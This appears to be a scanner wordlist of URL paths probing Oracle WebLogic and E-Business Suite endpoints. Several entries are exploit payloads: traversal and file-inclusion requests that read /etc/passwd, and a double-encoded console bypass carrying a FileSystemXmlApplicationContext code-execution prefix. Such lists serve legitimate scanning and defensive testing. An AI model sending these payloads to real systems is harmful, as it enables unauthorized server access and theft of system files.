/ws_utc/config.do
/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(
/console/login/LoginForm.jsp
/manage/fileDownloader?sec=1
/oam/server/opensso/sessionservice
/oim/afr/xx/remote/ww
/reports/rwservlet/showenv
/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///
/_async/AsyncResponseService
/console/images/%252e%252e%252fconsole.portal
/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
